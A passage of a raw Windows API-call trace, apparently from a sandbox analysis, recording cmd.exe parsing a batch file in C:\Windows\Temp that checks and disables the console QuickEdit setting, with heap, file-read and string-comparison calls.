(_String1="_args", _String2="DATE") returned -5 [0178.054] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0178.054] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0178.054] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0178.054] GetProcessHeap () returned 0x19a8f1e0000 [0178.054] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0178.054] GetProcessHeap () returned 0x19a8f1e0000 [0178.054] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20e980) returned 1 [0178.054] GetProcessHeap () returned 0x19a8f1e0000 [0178.055] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.055] _wcsicmp (_String1="for", _String2=")") returned 61 [0178.055] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0178.056] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0178.056] GetProcessHeap () returned 0x19a8f1e0000 [0178.056] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0178.056] GetProcessHeap () returned 0x19a8f1e0000 [0178.056] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f8ac0 [0178.056] GetProcessHeap () returned 0x19a8f1e0000 [0178.056] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb800 [0178.056] GetProcessHeap () returned 0x19a8f1e0000 [0178.056] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb800, Size=0x18) returned 0x19a8f1ec860 [0178.056] GetProcessHeap () returned 0x19a8f1e0000 [0178.056] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec860) returned 0x18 [0178.056] _wcsicmp (_String1="/L", _String2="%#") returned 10 [0178.056] _wcsicmp (_String1="/D", _String2="%#") returned 10 [0178.056] _wcsicmp (_String1="/F", _String2="%#") returned 10 [0178.056] _wcsicmp (_String1="/R", _String2="%#") returned 10 [0178.056] _wcsicmp (_String1="IN", _String2="in") returned 0 [0178.056] _wcsicmp (_String1="DO", _String2="do") returned 0 [0178.056] GetProcessHeap () returned 0x19a8f1e0000 [0178.056] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0178.056] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0178.056] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0178.056] _wcsicmp (_String1="IF", _String2="if") returned 0 [0178.056] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0178.057] GetProcessHeap () returned 0x19a8f1e0000 [0178.057] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0178.057] GetProcessHeap () returned 0x19a8f1e0000 [0178.057] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec940 [0178.057] GetProcessHeap () returned 0x19a8f1e0000 [0178.057] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb920 [0178.057] GetProcessHeap () returned 0x19a8f1e0000 [0178.057] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb920, Size=0x1a) returned 0x19a8f1eb800 [0178.057] GetProcessHeap () returned 0x19a8f1e0000 [0178.057] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb800) returned 0x1a [0178.057] _wcsicmp (_String1="/i", _String2="/I") returned 0 [0178.057] GetProcessHeap () returned 0x19a8f1e0000 [0178.057] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0178.057] GetProcessHeap () returned 0x19a8f1e0000 [0178.057] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb8f0 [0178.057] _wcsicmp (_String1="ERRORLEVEL", _String2="\"%#\"") returned 67 [0178.057] _wcsicmp (_String1="EXIST", _String2="\"%#\"") returned 67 [0178.057] _wcsicmp (_String1="CMDEXTVERSION", _String2="\"%#\"") returned 65 [0178.057] _wcsicmp (_String1="DEFINED", _String2="\"%#\"") returned 66 [0178.057] _wcsicmp (_String1="NOT", _String2="\"%#\"") returned 76 [0178.057] GetProcessHeap () returned 0x19a8f1e0000 [0178.057] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6e0 [0178.057] GetProcessHeap () returned 0x19a8f1e0000 [0178.057] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb980 [0178.058] _wcsicmp (_String1="set", _String2=")") returned 74 [0178.058] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0178.058] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0178.058] _wcsicmp (_String1="IF", _String2="set") returned -10 [0178.058] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0178.058] _wcsicmp (_String1="REM", _String2="set") returned -1 [0178.058] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0178.058] GetProcessHeap () returned 0x19a8f1e0000 [0178.058] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0178.058] GetProcessHeap () returned 0x19a8f1e0000 [0178.058] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd40 [0178.058] GetProcessHeap () returned 0x19a8f1e0000 [0178.058] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb9e0 [0178.058] _wcsicmp (_String1="ELSE", _String2=")") returned 60 [0178.058] _tell (_FileHandle=3) returned 6282 [0178.058] _close (_FileHandle=3) returned 0 [0178.058] GetProcessHeap () returned 0x19a8f1e0000 [0178.058] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x58) returned 0x19a8f1f8760 [0178.058] GetProcessHeap () returned 0x19a8f1e0000 [0178.059] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecc20 [0178.059] GetProcessHeap () returned 0x19a8f1e0000 [0178.059] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec740 [0178.059] GetProcessHeap () returned 0x19a8f1e0000 [0178.059] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecda0 [0178.059] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.059] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0178.059] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.059] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0178.060] _get_osfhandle (_FileHandle=0) returned 0x20 [0178.060] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0178.060] SetConsoleInputExeNameW () returned 0x1 [0178.060] GetConsoleOutputCP () returned 0x1b5 [0178.060] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0178.060] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.061] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0178.061] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0178.061] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.061] SetFilePointer (in: hFile=0x90, lDistanceToMove=6282, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x188a [0178.061] GetProcessHeap () returned 0x19a8f1e0000 [0178.061] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecda0) returned 1 [0178.061] GetProcessHeap () returned 0x19a8f1e0000 [0178.061] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec740) returned 1 [0178.061] GetProcessHeap () returned 0x19a8f1e0000 [0178.061] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc20) returned 1 [0178.061] GetProcessHeap () returned 0x19a8f1e0000 [0178.062] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8760) returned 1 [0178.062] GetProcessHeap () returned 0x19a8f1e0000 [0178.062] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0178.062] GetProcessHeap () returned 0x19a8f1e0000 [0178.062] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd40) returned 1 [0178.062] GetProcessHeap () returned 0x19a8f1e0000 [0178.063] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0178.063] GetProcessHeap () returned 0x19a8f1e0000 [0178.063] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0178.063] GetProcessHeap () returned 0x19a8f1e0000 [0178.063] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0178.063] GetProcessHeap () returned 0x19a8f1e0000 [0178.063] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0178.063] GetProcessHeap () returned 0x19a8f1e0000 [0178.064] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0178.064] GetProcessHeap () returned 0x19a8f1e0000 [0178.064] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0178.064] GetProcessHeap () returned 0x19a8f1e0000 [0178.064] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec940) returned 1 [0178.064] GetProcessHeap () returned 0x19a8f1e0000 [0178.064] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0178.064] GetProcessHeap () returned 0x19a8f1e0000 [0178.064] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0178.064] GetProcessHeap () returned 0x19a8f1e0000 [0178.064] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec860) returned 1 [0178.064] GetProcessHeap () returned 0x19a8f1e0000 [0178.065] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8ac0) returned 1 [0178.065] GetProcessHeap () returned 0x19a8f1e0000 [0178.065] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0178.065] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.065] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x188a [0178.066] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.066] SetFilePointer (in: hFile=0x90, lDistanceToMove=6284, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x188c [0178.066] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nr %%# in (%_args%) do (if /i \"%%#\"==\"-qedit\" set quedit=1)\r\nhe operation and leads to the confusion that script stopped due to an error\r\n\n") returned 2 [0178.066] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.066] GetFileType (hFile=0x90) returned 0x1 [0178.066] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.066] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x188c [0178.066] GetProcessHeap () returned 0x19a8f1e0000 [0178.066] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.066] GetProcessHeap () returned 0x19a8f1e0000 [0178.067] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.067] _tell (_FileHandle=3) returned 6284 [0178.067] _close (_FileHandle=3) returned 0 [0178.067] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0178.067] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0178.067] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.067] SetFilePointer (in: hFile=0x90, lDistanceToMove=6284, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x188c [0178.068] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.068] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x188c [0178.068] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.068] SetFilePointer (in: hFile=0x90, lDistanceToMove=6378, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x18ea [0178.068] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="reg query HKCU\\Console /v QuickEdit %nul2% | find /i \"0x0\" %nul1% || if not defined quedit (\r\n", cbMultiByte=94, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="reg query HKCU\\Console /v QuickEdit %nul2% | find /i \"0x0\" %nul1% || if not defined quedit (\r\nnfusion that script stopped due to an error\r\n\n") returned 94 [0178.068] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.068] GetFileType (hFile=0x90) returned 0x1 [0178.068] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.068] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x18ea [0178.068] GetProcessHeap () returned 0x19a8f1e0000 [0178.068] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.068] GetProcessHeap () returned 0x19a8f1e0000 [0178.068] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20e980 [0178.069] GetProcessHeap () returned 0x19a8f1e0000 [0178.069] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6b0 [0178.069] GetEnvironmentVariableW (in: lpName="nul2", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x5 [0178.069] GetProcessHeap () returned 0x19a8f1e0000 [0178.069] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0178.069] GetProcessHeap () returned 0x19a8f1e0000 [0178.069] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20e980) returned 1 [0178.070] GetProcessHeap () returned 0x19a8f1e0000 [0178.070] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20e980 [0178.070] GetProcessHeap () returned 0x19a8f1e0000 [0178.070] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb770 [0178.070] GetEnvironmentVariableW (in: lpName="nul1", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x5 [0178.070] GetProcessHeap () returned 0x19a8f1e0000 [0178.070] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0178.070] GetProcessHeap () returned 0x19a8f1e0000 [0178.070] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20e980) returned 1 [0178.070] GetProcessHeap () returned 0x19a8f1e0000 [0178.071] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.071] _wcsicmp (_String1="reg", _String2=")") returned 73 [0178.071] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0178.071] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0178.071] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0178.071] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0178.071] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0178.071] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0178.071] GetProcessHeap () returned 0x19a8f1e0000 [0178.072] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0178.072] GetProcessHeap () returned 0x19a8f1e0000 [0178.072] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec8a0 [0178.072] GetProcessHeap () returned 0x19a8f1e0000 [0178.072] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f8a60 [0178.072] GetProcessHeap () returned 0x19a8f1e0000 [0178.072] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0a70 [0178.072] GetProcessHeap () returned 0x19a8f1e0000 [0178.072] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecce0 [0178.072] GetProcessHeap () returned 0x19a8f1e0000 [0178.072] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x56) returned 0x19a8f1f8820 [0178.072] GetProcessHeap () returned 0x19a8f1e0000 [0178.072] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0178.072] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0178.072] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0178.072] _wcsicmp (_String1="IF", _String2="find") returned 3 [0178.072] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0178.072] _wcsicmp (_String1="REM", _String2="find") returned 12 [0178.072] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0178.072] GetProcessHeap () returned 0x19a8f1e0000 [0178.072] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0178.072] GetProcessHeap () returned 0x19a8f1e0000 [0178.072] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb800 [0178.072] GetProcessHeap () returned 0x19a8f1e0000 [0178.073] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb860 [0178.073] GetProcessHeap () returned 0x19a8f1e0000 [0178.073] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0df0 [0178.073] GetProcessHeap () returned 0x19a8f1e0000 [0178.073] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecc60 [0178.073] GetProcessHeap () returned 0x19a8f1e0000 [0178.073] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb8f0 [0178.073] GetProcessHeap () returned 0x19a8f1e0000 [0178.073] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0178.073] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0178.073] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0178.073] _wcsicmp (_String1="IF", _String2="if") returned 0 [0178.073] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0178.073] GetProcessHeap () returned 0x19a8f1e0000 [0178.073] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1eddd0 [0178.073] GetProcessHeap () returned 0x19a8f1e0000 [0178.073] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecba0 [0178.073] GetProcessHeap () returned 0x19a8f1e0000 [0178.073] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb950 [0178.073] GetProcessHeap () returned 0x19a8f1e0000 [0178.073] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb950, Size=0x1a) returned 0x19a8f1eb920 [0178.073] GetProcessHeap () returned 0x19a8f1e0000 [0178.073] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb920) returned 0x1a [0178.073] _wcsicmp (_String1="not", _String2="/I") returned 63 [0178.074] GetProcessHeap () returned 0x19a8f1e0000 [0178.074] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0178.074] GetProcessHeap () returned 0x19a8f1e0000 [0178.074] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec6a0 [0178.074] _wcsicmp (_String1="ERRORLEVEL", _String2="not") returned -9 [0178.074] _wcsicmp (_String1="EXIST", _String2="not") returned -9 [0178.074] _wcsicmp (_String1="CMDEXTVERSION", _String2="not") returned -11 [0178.074] _wcsicmp (_String1="DEFINED", _String2="not") returned -10 [0178.074] _wcsicmp (_String1="NOT", _String2="not") returned 0 [0178.074] GetProcessHeap () returned 0x19a8f1e0000 [0178.074] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0178.074] GetProcessHeap () returned 0x19a8f1e0000 [0178.074] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb950 [0178.074] _wcsicmp (_String1="ERRORLEVEL", _String2="defined") returned 1 [0178.074] _wcsicmp (_String1="EXIST", _String2="defined") returned 1 [0178.074] _wcsicmp (_String1="CMDEXTVERSION", _String2="defined") returned -1 [0178.074] _wcsicmp (_String1="DEFINED", _String2="defined") returned 0 [0178.074] GetProcessHeap () returned 0x19a8f1e0000 [0178.074] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb740 [0178.074] GetProcessHeap () returned 0x19a8f1e0000 [0178.074] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2c) returned 0x19a8f1e0b70 [0178.074] GetProcessHeap () returned 0x19a8f1e0000 [0178.074] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0b70, Size=0x20) returned 0x19a8f1eb980 [0178.074] GetProcessHeap () returned 0x19a8f1e0000 [0178.074] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb980) returned 0x20 [0178.075] GetProcessHeap () returned 0x19a8f1e0000 [0178.075] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0178.075] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.075] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x18ea [0178.075] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb90, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb90*=0x1fff, lpOverlapped=0x0) returned 1 [0178.075] SetFilePointer (in: hFile=0x90, lDistanceToMove=6443, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x192b [0178.075] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="reg add HKCU\\Console /v QuickEdit /t REG_DWORD /d \"0\" /f %nul1%\r\n", cbMultiByte=65, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="reg add HKCU\\Console /v QuickEdit /t REG_DWORD /d \"0\" /f %nul1%\r\n || if not defined quedit (\r\nnfusion that script stopped due to an error\r\n\n") returned 65 [0178.075] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.075] GetFileType (hFile=0x90) returned 0x1 [0178.075] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.075] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x192b [0178.075] GetProcessHeap () returned 0x19a8f1e0000 [0178.075] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.076] GetProcessHeap () returned 0x19a8f1e0000 [0178.076] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20e980 [0178.076] GetProcessHeap () returned 0x19a8f1e0000 [0178.076] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb9e0 [0178.076] GetEnvironmentVariableW (in: lpName="nul1", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x5 [0178.076] GetProcessHeap () returned 0x19a8f1e0000 [0178.076] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0178.076] GetProcessHeap () returned 0x19a8f1e0000 [0178.077] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20e980) returned 1 [0178.077] GetProcessHeap () returned 0x19a8f1e0000 [0178.077] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.078] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0178.078] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0178.078] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0178.078] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0178.078] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0178.078] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0178.078] GetProcessHeap () returned 0x19a8f1e0000 [0178.078] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0178.078] GetProcessHeap () returned 0x19a8f1e0000 [0178.078] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec700 [0178.078] GetProcessHeap () returned 0x19a8f1e0000 [0178.078] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x7e) returned 0x19a8f1eaed0 [0178.079] GetProcessHeap () returned 0x19a8f1e0000 [0178.079] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0f70 [0178.079] GetProcessHeap () returned 0x19a8f1e0000 [0178.079] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec900 [0178.079] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.079] SetFilePointer (in: hFile=0x90, 